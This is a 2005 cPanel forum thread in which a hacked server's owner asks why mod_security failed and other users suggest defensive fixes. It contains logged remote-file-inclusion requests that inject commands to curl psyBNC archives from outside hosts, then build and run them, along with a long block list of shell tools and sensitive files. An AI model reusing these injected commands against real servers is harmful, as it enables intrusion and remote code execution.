The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

server hacked

Discussion in 'General Discussion' started by parser, Oct 12, 2005.

  1. parser

    parser Member

    Joined:
    Aug 22, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Israel
    Hello,

    today my server hacked,
    201.5.212.224 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20lgbos.100free.com/psybnc.tar.gz;tar%20-zxvf%20psybnc.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:49:52 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc.tar.gz HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:50:54 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz HTTP/1.1" 200 6472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:51:27 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-xvzf%20psybnc.tar.gz HTTP/1.1" 200 15481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:51:42 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;cd%20psybnc;make;pico%20psybnc.conf;./psybnc HTTP/1.1" 200 6129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:52:50 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:53:40 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.geocities.com/sorin_smen/psybnc.tgz HTTP/1.1" 200 6867 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:53:47 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-zxvf%20psybnc.tgz;cd%20psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:54:02 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


    i have modsec.user.conf, but is not help. Why?

    # Require HTTP_USER_AGENT and HTTP_HOST in all requests
    # SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

    # Require Content-Length to be provided with
    # every POST request
    SecFilterSelective REQUEST_METHOD "^POST$" chain
    SecFilterSelective HTTP_Content-Length "^$"

    # Don't accept transfer encodings we know we don't handle
    # (and you don't need it anyway)
    SecFilterSelective HTTP_Transfer-Encoding "!^$"

    # Protecting from XSS attacks through the PHP session cookie
    SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
    SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

    SecFilter "viewtopic\.php\?" chain
    SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

    # Block various methods of downloading files to a server
    SecFilterSelective THE_REQUEST "wget "
    SecFilterSelective THE_REQUEST "lynx "
    SecFilterSelective THE_REQUEST "scp "
    SecFilterSelective THE_REQUEST "ftp "
    SecFilterSelective THE_REQUEST "cvs "
    SecFilterSelective THE_REQUEST "rcp "
    SecFilterSelective THE_REQUEST "telnet "
    SecFilterSelective THE_REQUEST "ssh "
    SecFilterSelective THE_REQUEST "echo "
    SecFilterSelective THE_REQUEST "links -dump "
    SecFilterSelective THE_REQUEST "links -dump-charset "
    SecFilterSelective THE_REQUEST "links -dump-width "
    SecFilterSelective THE_REQUEST "links http:// "
    SecFilterSelective THE_REQUEST "links ftp:// "
    SecFilterSelective THE_REQUEST "links -source "
    SecFilterSelective THE_REQUEST "mkdir "
    SecFilterSelective THE_REQUEST "cd /tmp "
    SecFilterSelective THE_REQUEST "cd /var/tmp "
    SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "


    # WEB-ATTACKS ps command attempt
    SecFilterSelective THE_REQUEST "/bin/ps"

    # WEB-ATTACKS /bin/ps command attempt
    SecFilterSelective THE_REQUEST "ps\x20"

    # WEB-ATTACKS wget command attempt
    SecFilter "wget\x20"

    # WEB-ATTACKS uname -a command attempt
    SecFilter "uname\x20-a"

    # WEB-ATTACKS /usr/bin/id command attempt
    SecFilter "/usr/bin/id"

    # WEB-ATTACKS id command attempt
    SecFilter "\;id"

    # WEB-ATTACKS echo command attempt
    SecFilter "/bin/echo"

    # WEB-ATTACKS kill command attempt
    SecFilter "/bin/kill"

    # WEB-ATTACKS chmod command attempt
    SecFilter "/bin/chmod"

    # WEB-ATTACKS chgrp command attempt
    SecFilter "/chgrp"

    # WEB-ATTACKS chown command attempt
    SecFilter "/chown"

    # WEB-ATTACKS chsh command attempt
    SecFilter "/usr/bin/chsh"

    # WEB-ATTACKS tftp command attempt
    SecFilter "tftp\x20"

    # WEB-ATTACKS /usr/bin/gcc command attempt
    SecFilter "/usr/bin/gcc"

    # WEB-ATTACKS gcc command attempt
    SecFilter "gcc\x20-o"

    # WEB-ATTACKS /usr/bin/cc command attempt
    SecFilter "/usr/bin/cc"

    # WEB-ATTACKS cc command attempt
    SecFilter "cc\x20"

    # WEB-ATTACKS /usr/bin/cpp command attempt
    SecFilter "/usr/bin/cpp"

    # WEB-ATTACKS cpp command attempt
    SecFilter "cpp\x20"

    # WEB-ATTACKS /usr/bin/g++ command attempt
    SecFilter "/usr/bin/g\+\+"

    # WEB-ATTACKS g++ command attempt
    SecFilter "g\+\+\x20"

    # WEB-ATTACKS bin/python access attempt
    SecFilter "bin/python"

    # WEB-ATTACKS python access attempt
    SecFilter "python\x20"

    # WEB-ATTACKS bin/tclsh execution attempt
    SecFilter "bin/tclsh"

    # WEB-ATTACKS tclsh execution attempt
    SecFilter "tclsh8\x20"

    # WEB-ATTACKS bin/nasm command attempt
    SecFilter "bin/nasm"

    # WEB-ATTACKS nasm command attempt
    SecFilter "nasm\x20"

    # WEB-ATTACKS /usr/bin/perl execution attempt
    SecFilter "/usr/bin/perl"

    # WEB-ATTACKS perl execution attempt
    SecFilter "perl\x20"

    # WEB-ATTACKS nt admin addition attempt
    SecFilter "net localgroup administrators /add"

    # WEB-ATTACKS traceroute command attempt
    SecFilter "traceroute\x20"

    # WEB-ATTACKS ping command attempt
    SecFilter "/bin/ping"

    # WEB-ATTACKS netcat command attempt
    SecFilter "nc\x20"

    # WEB-ATTACKS nmap command attempt
    SecFilter "nmap\x20"

    # WEB-ATTACKS xterm command attempt
    SecFilter "/usr/X11R6/bin/xterm"

    # WEB-ATTACKS X application to remote host attempt
    SecFilter "\x20-display\x20"

    # WEB-ATTACKS lsof command attempt
    SecFilter "lsof\x20"

    # WEB-ATTACKS rm command attempt
    SecFilter "rm\x20"

    # WEB-ATTACKS mail command attempt
    SecFilter "/bin/mail"

    # WEB-ATTACKS mail command attempt
    SecFilter "mail\x20"

    # WEB-ATTACKS /bin/ls command attempt
    SecFilterSelective THE_REQUEST "/bin/ls"

    # WEB-ATTACKS /etc/inetd.conf access
    SecFilter "/etc/inetd\.conf" log,pass

    # WEB-ATTACKS /etc/motd access
    SecFilter "/etc/motd" log,pass

    # WEB-ATTACKS /etc/shadow access
    SecFilter "/etc/shadow" log,pass

    # WEB-ATTACKS conf/httpd.conf attempt
    SecFilter "conf/httpd\.conf" log,pass

    # WEB-ATTACKS .htgroup access
    SecFilterSelective THE_REQUEST "\.htgroup" log,pass

    #PHP-NUKE spam filter
    SecFilter "name=WebMail"

    #PHP-NUKE web attack
    SecFilter "cd%20/var/tmp;"

    #PHP-NUKE web attack
    SecFilter "cd%20/var/tmp"

    #PHP-NUKE web attack
    SecFilter "cd%20/tmp"

    #PHP-NUKE web attack
    SecFilter "chmod%204777"

    # phpbb2 shell exploit
    SecFilter "rush="
    SecFilter "highlight=%2527"
    SecFilter "highlight=%2725"
    SecFilter "highlight=%27"
     
  2. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,192
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    Root Administrator
    check if LoadModule is active at the httpd.conf.
     
  3. sh4ka

    sh4ka Well-Known Member

    Joined:
    May 12, 2005
    Messages:
    442
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    cPanel Access Level:
    DataCenter Provider
    You should better check if the Addmodule mod_security is not commented or if it exists at the AddModule section. Also try to activate all process listed on "background process killer" at "System Health" in the left WHM menu.

    Is your Mod security installed from the Add on in WHM ??
     
  4. neta5

    neta5 Active Member

    Joined:
    Oct 7, 2005
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    you mean its better that we Turn on these item?
    BitchX
    bnc
    eggdrop
    generic-sniffers
    guardservices
    ircd
    psyBNC
    ptlink
    services
     
  5. parser

    parser Member

    Joined:
    Aug 22, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Israel
    Active, it problem with filtring of mod_secure.

    In audit_log (Log of mod_secure), all for example "wget" denied with code 406.
     
  6. parser

    parser Member

    Joined:
    Aug 22, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Israel

    Yes, installed from WHM.
    I Activated all process listed on "background process killer". Thanks!
     
  7. domtaj

    domtaj Active Member

    Joined:
    Aug 29, 2005
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    The file got dropped by way of curl, so better put

    SecFilterSelective THE_REQUEST "curl "

    into mod_security's conf file

    as that will also stop other non detected drops
     
Loading...

Share This Page